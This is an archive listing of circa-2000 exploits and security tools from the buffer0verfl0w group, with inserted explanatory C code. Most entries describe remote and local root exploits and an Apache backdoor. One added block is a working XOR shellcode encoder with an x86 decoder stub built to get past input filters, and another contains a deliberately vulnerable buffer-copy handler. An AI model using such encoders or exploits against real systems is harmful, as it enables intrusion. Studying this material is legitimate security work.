Section: advisories / b0f
/// File Name: bobek.c
Description: bobek.c is a remote root exploit for wu-ftpd 2.6.0 (updated 05/08/2000). The bug is a format-string vulnerability in the SITE EXEC command (CVE-2000-0573); no account is required, since anonymous access is enough to reach it. Tested against Red Hat 6.2, FreeBSD 3.4-STABLE and FreeBSD 5.0-CURRENT.
Author: Venglin
Homepage: http://b0f.freebsd.lublin.pl
File Size: 14677
Last Modified: Dec 6 03:10:00 2000
MD5 Checksum: 72aa028cb868dcaf240a98d147e3f193

/// File Name: access-counter.pl
Description: The popular CGI web page access counter, version 4.0.7 by George Burgyan, allows execution of arbitrary commands because user input is not checked. Commands are executed with the privileges of the web server.
Author: Slash
Homepage: http://b0f.freebsd.lublin.pl
File Size: 2753
Last Modified: Sep 13 06:18:27 2000
MD5 Checksum: 2beb4c9aa7ffd4a6559b4ee451132a24

/// File Name: lpset.pl
Description: Perl port of the exploit for the /usr/bin/lpset local root vulnerability on Solaris/SPARC 2.7. Based on lpset.sh.
Author: Slash
Homepage: http://b0f.freebsd.lublin.pl
File Size: 1416
Last Modified: Sep 13 06:06:48 2000
MD5 Checksum: 273a18bea943ed29e39af2008e2f53e1

/// File Name: sscan2k-pre4.HWA.tar.gz
Description: jsbach handed sscan over to buffer0verfl0w security so that the project could be continued on his behalf. From now on sscan goes by the name sscan2k. sscan2k has updated vulnerability checks and the code has been cleaned up. This scanner is now released by HWA.
Author: eth0
Homepage: http://hwa-security.net
File Size: 336183
Last Modified: Aug 31 02:01:45 2000
MD5 Checksum: fa578e3f4a7d3b3965d3efbc2a1694dd

/// File Name: smegma_v0.4.tgz
Description: SMEGMA is an engine for garbling shellcode with one of several encryption mechanisms and making it self-decrypting by prepending an Intel x86 machine-code decryptor. It uses a hand-written C lexer to pull the shellcode out of source files and try to identify it. Use SMEGMA when characters in the shellcode would otherwise be mangled by input filtering, such as the regular-expression checks commonly found in CGI binaries, web applications and web servers.
Author: Scrippie
Homepage: http://b0f.freebsd.lublin.pl
Changes: Fixed all NULL byte problems (smegma can now rid shellcode of NULL characters); more garbling algorithms; more efficient garbling algorithms; fixed the size problem.
File Size: 20173
Last Modified: Jul 24 18:24:06 2000
MD5 Checksum: 651b6173fc24873f8ad4e5f846fba666

/// File Name: smegma_v0.2.tgz
Description: SMEGMA is an engine for garbling shellcode with one of several encryption mechanisms and making it self-decrypting by prepending an Intel x86 machine-code decryptor. It uses a hand-written C lexer to pull the shellcode out of source files and try to identify it. Use SMEGMA when characters in the shellcode would otherwise be mangled by input filtering, such as the regular-expression checks commonly found in CGI binaries, web applications and web servers.
Author: Scrippie
Homepage: http://b0f.freebsd.lublin.pl
File Size: 11102
Last Modified: Jul 8 07:56:51 2000
MD5 Checksum: 42981bfacdfe3138a8734be57bbed972

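The mechanism described in the two SMEGMA entries above (v0.4 and v0.2), as an added example that is not SMEGMA's own code: XOR is used as the garbling step, a 21-byte jmp/call/pop decoder is prepended, and every XOR key is tried until neither the stub nor the garbled payload contains a byte from the bad-byte set. The sample instruction bytes, the bad-byte set and the function names are constructed for this demo; the stub's fixed bytes and its one-byte length field (payloads up to 255 bytes, the kind of size limit the v0.4 changelog refers to) are limits of this example, not statements about SMEGMA.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration in the spirit of SMEGMA, not SMEGMA's code: XOR-garble a
 * payload and prepend a self-decoding x86-32 stub so the final buffer carries
 * none of the bytes a filter would mangle. Sample bytes are constructed. */

#define STUB_LEN 21

/* Position-independent decoder (jmp / call / pop trick), 21 bytes:
 *   00: EB 0E           jmp short +14     -> 16 (call_decoder)
 *   02: 5E              pop esi           ; esi = address of payload
 *   03: 90              nop               ; keeps the jmp displacement off 0x0D (CR)
 *   04: 31 C9           xor ecx, ecx
 *   06: B1 LEN          mov cl, LEN       ; payload length, max 255
 *   08: 80 36 KEY       xor byte [esi], KEY
 *   0B: 46              inc esi
 *   0C: E2 FA           loop -6           -> 08
 *   0E: EB 05           jmp short +5      -> 21 (payload)
 *   10: E8 ED FF FF FF  call -19          -> 02, pushes the payload address
 *   15: payload ... */
static void build_stub(unsigned char *stub, unsigned char key, unsigned char len)
{
    static const unsigned char tmpl[STUB_LEN] = {
        0xEB, 0x0E, 0x5E, 0x90, 0x31, 0xC9, 0xB1, 0x00, 0x80, 0x36, 0x00,
        0x46, 0xE2, 0xFA, 0xEB, 0x05, 0xE8, 0xED, 0xFF, 0xFF, 0xFF
    };
    memcpy(stub, tmpl, STUB_LEN);
    stub[7] = len;     /* LEN operand of mov cl */
    stub[10] = key;    /* KEY operand of xor byte [esi] */
}

/* Index of the first byte of buf found in the bad set, or -1 if clean. */
int first_bad_byte(const unsigned char *buf, size_t n,
                   const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) return (int)i;
    return -1;
}

/* Try every XOR key. Returns stub+payload length, or 0 if no key keeps both
 * the stub and the garbled payload free of bad bytes. */
size_t smegma_encode(const unsigned char *sc, size_t len,
                     const unsigned char *bad, size_t nbad,
                     unsigned char *out, size_t outcap)
{
    if (len == 0 || len > 255 || outcap < STUB_LEN + len) return 0;
    for (unsigned key = 1; key < 256; key++) {
        build_stub(out, (unsigned char)key, (unsigned char)len);
        for (size_t i = 0; i < len; i++)
            out[STUB_LEN + i] = sc[i] ^ (unsigned char)key;
        if (first_bad_byte(out, STUB_LEN + len, bad, nbad) < 0)
            return STUB_LEN + len;
    }
    return 0;
}

/* Emulate in C what the stub does at run time: read LEN and KEY back out of
 * the stub and un-XOR the payload. Returns payload length, 0 if not our stub. */
size_t smegma_decode(const unsigned char *blob, size_t total, unsigned char *out)
{
    if (total < STUB_LEN || blob[0] != 0xEB || blob[1] != 0x0E || blob[16] != 0xE8)
        return 0;
    size_t len = blob[7];
    unsigned char key = blob[10];
    if (total != STUB_LEN + len) return 0;
    for (size_t i = 0; i < len; i++)
        out[i] = blob[STUB_LEN + i] ^ key;
    return len;
}

/* Constructed sample: "mov eax, 11 ; int 0x80", which carries three NULs.
 * It is an instruction fragment for the demo, not a working shellcode. */
const unsigned char SAMPLE_SC[] = { 0xB8, 0x0B, 0x00, 0x00, 0x00, 0xCD, 0x80 };
/* Constructed bad-byte set: NUL, LF, CR, space. */
const unsigned char SAMPLE_BAD[] = { 0x00, 0x0A, 0x0D, 0x20 };

int main(void)
{
    unsigned char out[300];
    size_t n = smegma_encode(SAMPLE_SC, sizeof SAMPLE_SC,
                             SAMPLE_BAD, sizeof SAMPLE_BAD, out, sizeof out);
    if (n == 0) { puts("no usable key"); return 1; }
    printf("key=0x%02x len=%u total=%zu\n", out[10], out[7], n);
    for (size_t i = 0; i < n; i++) printf("\\x%02x", out[i]);
    putchar('\n');
    return 0;
}
```

The stub decodes in place, so the payload has to land in memory that is both writable and executable (a stack buffer on a system without non-executable stack protection, which is what the 2000-era targets on this page assume). If the filter also rejects one of the stub's fixed bytes (0xEB, 0x0E, 0x5E, 0x90, 0x31, 0xC9, 0xB1, 0x80, 0x36, 0x46, 0xE2, 0xFA, 0x05, 0xE8, 0xED, 0xFF), no key can help, smegma_encode() returns 0, and a different decoder stub is needed.
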
/// File Name: htaccess-admin.tar.gz
Description: htaccess.tar - Perl script for adding users to the .htaccess file. Includes instructions for setting up password-protected web pages.
Author: Slash
Homepage: http://b0f.freebsd.lublin.pl
File Size: 4591
Last Modified: Jul 5 23:55:30 2000
MD5 Checksum: 27de7a057fe0c6373a9ad4390699239f

/// File Name: elm-exploit.c
Description: Linux Elm 2.4/2.5 local exploit. Gives you a shell with gid=12 (the mail group) if /usr/bin/elm is SGID. Tested on Slackware 4.0 and Red Hat 5.1.
Author: Slash
Homepage: http://b0f.freebsd.lublin.pl
File Size: 2111
Last Modified: Jul 5 23:53:02 2000
MD5 Checksum: 82f10bfc8741bb629281379f2f03ccc9

/// File Name: majordomeX.sh
Description: Majordomo v1.94.5 local Linux exploit: runs commands as the UID that Majordomo runs under.
Author: Slash
Homepage: http://b0f.freebsd.lublin.pl
File Size: 3665
Last Modified: Jul 5 23:51:36 2000
MD5 Checksum: 5ce22449e2db60174798412395e28845

/// File Name: rip.c
Description: rip.c is a local exploit for the restore binary from the dump package, versions 0.3-14 and 0.4b13. Tested on Linux: gives a UID 0 shell on 2.2.16 and a GID 0 shell on 2.2.15 and earlier.
Author: Scrippie
Homepage: http://b0f.freebsd.lublin.pl
File Size: 7097
Last Modified: Jun 14 18:53:14 2000
MD5 Checksum: 72ac3db000356b4d9dbb3ddbe8d83541

/// File Name: p0f.tgz
Description: p0f performs passive OS detection by watching SYN packets, using tcpdump-style capture. It can also estimate the distance (hop count) to the remote host and can be used to map the structure of a foreign or local network. Running on the gateway of a network it gathers large amounts of data and provides useful statistics; on an end-user machine it can be used to track which operating system is behind each connection. p0f supports full tcpdump-style filter expressions and has an easily modified fingerprint database. Tested on Linux 2.0/2.2, FreeBSD, OpenBSD, NetBSD, SunOS and Solaris.
Author: Michal Zalewski
Homepage: http://lcamtuf.na.export.pl
File Size: 14685
Last Modified: Jun 13 20:31:01 2000
MD5 Checksum: d461b6d2c9103f7fe52a387570ff87bc

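The SYN-based fingerprinting and distance estimate described above, as an added example rather than p0f's own code: it parses one raw IPv4+TCP packet, collects the fields passive fingerprinting looks at (TTL, DF, window, MSS, window scale, SACK-OK, timestamps), derives the hop count from the nearest common initial TTL, and matches against a tiny signature table. The packet bytes, the signature values and their labels are constructed for this demo (the table is not p0f's fingerprint database), and the code works on an already-captured buffer, so no libpcap or tcpdump is involved.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration of p0f-style passive SYN fingerprinting; not p0f's code.
 * The packet and the signature table are constructed for this demo. */

struct syn_fp {
    int ttl;        /* TTL as seen on the wire */
    int df;         /* IP Don't-Fragment bit */
    int win;        /* TCP window */
    int mss;        /* MSS option, -1 if absent */
    int wscale;     /* window scale option, -1 if absent */
    int sack_ok;    /* SACK-permitted option present */
    int ts;         /* timestamp option present */
};

/* Parse an IPv4+TCP packet: 1 = pure SYN (fp filled), 0 = other TCP segment,
 * -1 = malformed or not IPv4/TCP. Every offset is bounds-checked so a crafted
 * packet cannot make the sniffer read past the captured bytes. */
int parse_syn(const unsigned char *pkt, size_t len, struct syn_fp *fp)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0F) * 4;
    if (ihl < 20 || ihl + 20 > len || pkt[9] != 6) return -1;
    const unsigned char *tcp = pkt + ihl;
    size_t doff = (size_t)(tcp[12] >> 4) * 4;
    if (doff < 20 || ihl + doff > len) return -1;
    if ((tcp[13] & 0x12) != 0x02) return 0;     /* SYN set, ACK clear */

    memset(fp, 0, sizeof *fp);
    fp->ttl = pkt[8];
    fp->df  = (pkt[6] & 0x40) != 0;
    fp->win = (tcp[14] << 8) | tcp[15];
    fp->mss = fp->wscale = -1;

    const unsigned char *opt = tcp + 20, *end = tcp + doff;
    while (opt < end) {
        unsigned kind = opt[0];
        if (kind == 0) break;                   /* end of option list */
        if (kind == 1) { opt++; continue; }     /* NOP */
        if (opt + 1 >= end) return -1;          /* no room for the length byte */
        size_t olen = opt[1];
        if (olen < 2 || olen > (size_t)(end - opt)) return -1;
        switch (kind) {
        case 2: if (olen == 4) fp->mss = (opt[2] << 8) | opt[3]; break;
        case 3: if (olen == 3) fp->wscale = opt[2]; break;
        case 4: if (olen == 2) fp->sack_ok = 1; break;
        case 8: if (olen == 10) fp->ts = 1; break;
        default: break;                         /* unknown options are skipped */
        }
        opt += olen;
    }
    return 1;
}

/* Stacks start the TTL at 32, 64, 128 or 255; the smallest of those not below
 * the observed TTL is the likely origin, and the difference is the hop count. */
int initial_ttl(int ttl)
{
    static const int starts[] = { 32, 64, 128, 255 };
    for (size_t i = 0; i < sizeof starts / sizeof starts[0]; i++)
        if (ttl <= starts[i]) return starts[i];
    return 255;
}

int hop_distance(int ttl) { return initial_ttl(ttl) - ttl; }

struct sig { int ittl, df, win, wscale, sack_ok, ts; const char *label; };

/* Illustrative signatures: assumed values, not a real fingerprint database. */
static const struct sig SIGS[] = {
    { 64,  1, 5840,  0,  1, 1, "Linux 2.4-class (illustrative)" },
    { 64,  1, 16384, -1, 0, 0, "BSD-class (illustrative)" },
    { 128, 1, 65535, -1, 1, 0, "Windows-class (illustrative)" },
};

const char *guess_os(const struct syn_fp *fp)
{
    int ittl = initial_ttl(fp->ttl);
    for (size_t i = 0; i < sizeof SIGS / sizeof SIGS[0]; i++) {
        const struct sig *s = &SIGS[i];
        if (s->ittl == ittl && s->df == fp->df && s->win == fp->win &&
            s->wscale == fp->wscale && s->sack_ok == fp->sack_ok && s->ts == fp->ts)
            return s->label;
    }
    return "unknown";
}

/* Constructed SYN: 192.168.1.10:50000 -> 10.0.0.5:80, TTL 57, DF set, window
 * 5840, options MSS 1460, SACK-OK, timestamps, NOP, wscale 0. Checksums are
 * left zero; the parser does not verify them. */
const unsigned char SAMPLE_SYN[60] = {
    0x45, 0x00, 0x00, 0x3C, 0x1A, 0x2B, 0x40, 0x00, 0x39, 0x06, 0x00, 0x00,
    0xC0, 0xA8, 0x01, 0x0A, 0x0A, 0x00, 0x00, 0x05,
    0xC3, 0x50, 0x00, 0x50, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
    0xA0, 0x02, 0x16, 0xD0, 0x00, 0x00, 0x00, 0x00,
    0x02, 0x04, 0x05, 0xB4, 0x04, 0x02,
    0x08, 0x0A, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x03, 0x03, 0x00
};

int main(void)
{
    struct syn_fp fp;
    if (parse_syn(SAMPLE_SYN, sizeof SAMPLE_SYN, &fp) != 1) { puts("not a SYN"); return 1; }
    printf("ttl=%d df=%d win=%d mss=%d wscale=%d sack=%d ts=%d\n",
           fp.ttl, fp.df, fp.win, fp.mss, fp.wscale, fp.sack_ok, fp.ts);
    printf("distance=%d hops, guess=%s\n", hop_distance(fp.ttl), guess_os(&fp));
    return 0;
}
```

The option walk is where a passive sniffer is most exposed: it processes packets it never asked for, so an option with a length of 0 or one that runs past the header must be rejected rather than trusted, as the checks on olen do here.
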
/// File Name: sscan2k-pre3.b0f.tar.gz
Description: sscan2k is a remote auditing/vulnerability scanner that determines the remote OS and scans the host for applicable vulnerabilities. Features updated vulnerability checks, a scripting language, support for plugins and add-ons, configurable OS fingerprints, and DNS zone and subnet scans. Based on sscan by jsbach.
Author: eth0
Homepage: http://b0f.freebsd.lublin.pl
Changes: Fixes by mixter.
File Size: 336314
Last Modified: Jun 8 22:22:42 2000
MD5 Checksum: f2afd7708edbbf1d301f9597e8fe4b30

/// File Name: mod_backdoor.c
Description: Apache DSO backdoor: a GET request for a "special" URL allows remote command execution.
Author: Slash
Homepage: http://b0f.freebsd.lublin.pl
File Size: 8809
Last Modified: Jun 5 20:52:24 2000
MD5 Checksum: 84e2f164eca988c6647d0dc512f4536c

/// File Name: slirp_bof.c
Description: Local buffer overflow exploit for Slirp v1.0.10 (RELEASE) on Linux; gives you an SGID shell if /usr/local/bin/slirp is mode 2755. Tested against Slackware 3.6. Includes a Perl script to find the offset.
Author: Vade79
Homepage: http://www.realhalo.org
File Size: 2368
Last Modified: Jun 1 01:16:23 2000
MD5 Checksum: 9ddd6bd76e029236ad287810c937b7b6

/// File Name: elm_last.c
Description: One last Elm v2.4/v2.5 exploit; gives EGID 12. This version works against almost all vulnerable versions of Elm.
Author: Vade79
Homepage: http://www.realhalo.org
File Size: 2056
Last Modified: Jun 1 01:12:00 2000
MD5 Checksum: 6d1932b3efa4e64a682800633f4c5a14

/// File Name: sms.c
Description: sms.c is a remote buffer overflow exploit for SMS 1.8.2 (a mail2sms gateway) via a long Subject line. Send the mail generated by this program and a shell will be listening on port 2222. Offsets are adjusted for Red Hat.
Author: Venglin
Homepage: http://b0f.freebsd.lublin.pl
File Size: 2324
Last Modified: Jun 1 00:35:49 2000
MD5 Checksum: 836481971d25cd24f48a3187fca55303

/// File Name: elm-ex.c
Description: Elm 2.5 PL3 exploit, tested under Linux Slackware 3.6, 4.0 and 7.0.
Author: Xfer
Homepage: http://b0f.freebsd.lublin.pl
File Size: 1505
Last Modified: May 28 02:04:14 2000
MD5 Checksum: b9dbcee5ff2f4b064e0d41d4dcffe519

/// File Name: filterape.c
Description: filterape.c exploits a new Elm buffer overflow to get EGID mail on Slackware.
Author: Scrippie
Homepage: http://b0f.freebsd.lublin.pl
File Size: 2686
Last Modified: May 25 20:42:02 2000
MD5 Checksum: f86550706037b74cbfed63994fc2c787

/// File Name: b0f5-Qpopper.txt
Description: BufferOverflow Security Advisory #5: remote shell via Qpopper 2.53. The qpop_euidl.c exploit is included. Requires a POP account on the server and gives UID mail.
Author: Prizm
Homepage: http://b0f.freebsd.lublin.pl
File Size: 5946
Last Modified: May 24 21:55:59 2000
MD5 Checksum: 2a4401d33c14ffe9385bfcd5c4240512

/// File Name: hellex.c
Description: hellex.c is a local buffer overflow exploit for the Hellkit 1.2 shellcode generation package. Tested on Red Hat 6.0.
Author: Narrow
Homepage: http://b0f.freebsd.lublin.pl
File Size: 911
Last Modified: May 23 17:33:52 2000
MD5 Checksum: 7e9d7f936be9cf422b078cf7e5a25146

/// File Name: sscan2k-pre2.b0f.tar.gz
Description: jsbach handed sscan over to buffer0verfl0w security so that the project could be continued on his behalf. From now on sscan goes by the name sscan2k. sscan2k has updated vulnerability checks along with all the other features it had before, improved OS detection (the user can update the fingerprints by editing Osdefs.ms, which is written in the sscan2k scripting language), etc.
Author: eth0, axess. Fixes: Mixter.
Homepage: http://www.b0f.com
File Size: 338859
Last Modified: May 23 00:16:13 2000
MD5 Checksum: 3ee58f3c6e90d5e587cc8b068b22548d

/// File Name: shellhit.c
Description: shellhit.c - TESO Hellkit contains a buffer overflow; this exploit is just meant to be funny. To all script kiddies: you won't get root from this, go and find something more useful.
Author: scrippie
Homepage: http://b0f.freebsd.lublin.pl
File Size: 1758
Last Modified: May 22 19:47:15 2000
MD5 Checksum: 6d6584ebc64b16234ea4a4c96a84f24a

/// File Name: syrin15.zip
Description: Buffer Syringe is a Win32 tool that tests a daemon for buffer overflows in its parameter(s) by brute-forcing (stressing) it: it injects a user-specified parameter or command whose value is a user-specified number of characters long. If the parameter being tested is vulnerable to an overflow and the specified length exceeds the parameter's limit, the daemon will most likely crash.
Author: Digital Monkey
Homepage: http://b0f.freebsd.lublin.pl
File Size: 27016
Last Modified: May 17 18:37:34 2000
MD5 Checksum: 51bab6a00325ec97984338d5a6892f72

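The length brute-forcing that Buffer Syringe performs over the network, as an added example that is not Buffer Syringe's code and runs entirely locally on a POSIX system: two constructed command handlers (one with an unchecked copy into a 64-byte stack buffer, one that refuses oversized input) are fed a parameter of growing length, each attempt in a forked child, and the first length at which the child dies is reported. The handlers and function names are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added example of Buffer Syringe-style length brute-forcing against an
 * in-process handler instead of a network daemon. Not Buffer Syringe's code;
 * both handlers are constructed for the demo. */

typedef int (*handler_fn)(const char *arg, size_t len);

/* Kept out of line so the copied buffer must really exist in memory. */
__attribute__((noinline)) static int checksum(const char *p, size_t n)
{
    int s = 0;
    for (size_t i = 0; i < n; i++) s += (unsigned char)p[i];
    return s;
}

/* Deliberately vulnerable "command handler": copies the parameter into a
 * fixed 64-byte stack buffer without checking its length. */
__attribute__((noinline)) int vulnerable_handler(const char *arg, size_t len)
{
    char buf[64];
    memcpy(buf, arg, len);             /* the overflow */
    return checksum(buf, len);
}

/* Hardened version: refuses oversized parameters instead of truncating silently. */
__attribute__((noinline)) int safe_handler(const char *arg, size_t len)
{
    char buf[64];
    if (len >= sizeof buf) return -1;  /* too long: reject */
    memcpy(buf, arg, len);
    buf[len] = '\0';
    return checksum(buf, len);
}

/* Feed the handler parameters of growing length, each in a forked child so a
 * crash cannot take the prober down. Returns the first length at which the
 * child died abnormally (signal or non-zero exit), or 0 if none up to max.
 * *sig receives the terminating signal, or 0 if the child merely exited non-zero. */
size_t probe_crash_length(handler_fn fn, size_t start, size_t step, size_t max, int *sig)
{
    char *payload = malloc(max);
    if (!payload) return 0;
    memset(payload, 'A', max);
    *sig = 0;
    for (size_t len = start; len <= max; len += step) {
        fflush(stdout);                            /* don't duplicate buffered output in the child */
        pid_t pid = fork();
        if (pid < 0) break;
        if (pid == 0) {
            volatile int sink = fn(payload, len);  /* volatile: keep the call alive */
            (void)sink;
            _exit(0);                              /* clean exit = handler survived this length */
        }
        int status = 0;
        if (waitpid(pid, &status, 0) < 0) break;
        if (WIFSIGNALED(status)) { *sig = WTERMSIG(status); free(payload); return len; }
        if (WIFEXITED(status) && WEXITSTATUS(status) != 0) { free(payload); return len; }
    }
    free(payload);
    return 0;
}

int main(void)
{
    int sig;
    size_t n = probe_crash_length(vulnerable_handler, 16, 16, 512, &sig);
    if (n) printf("vulnerable_handler: died at %zu bytes (signal %d)\n", n, sig);
    else   puts("vulnerable_handler: no crash up to 512 bytes");
    n = probe_crash_length(safe_handler, 16, 16, 512, &sig);
    printf("safe_handler: %s\n", n ? "crashed" : "no crash up to 512 bytes");
    return 0;
}
```

Treating any abnormal exit of the child as a hit, not only a signal, is what keeps the probe working under stack protectors, fortified memcpy and sanitizers, which terminate with SIGABRT or a non-zero exit code rather than a plain SIGSEGV. Against a real daemon the equivalent signal is a dropped connection or a service that stops answering, which is why a tool of this kind has to re-check liveness between attempts.
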
/// File Name: fdmnt-smash2.c
Description: fdmount local root exploit, tested on Slackware 4.0. You must be in the floppy group. Modified from the previous version to also work on Slackware 7.
Author: Scrippie
Homepage: http://b0f.freebsd.lublin.pl
File Size: 3165
Last Modified: May 17 18:33:38 2000
MD5 Checksum: 73ba3d26ba0ca02c1bd711b6e11af39d

/// File Name: Neon_beta5.c
Description: Neon beta5 - Simple CGI scanner that takes a single host or an IP list and runs 358 checks.
Author: Axess
Homepage: http://b0f.freebsd.lublin.pl
Changes: Added more CGI checks; improved output.
File Size: 37156
Last Modified: May 12 04:48:01 2000
MD5 Checksum: 0f51bd2e126eb23a4b2bb5ea4e549ad8
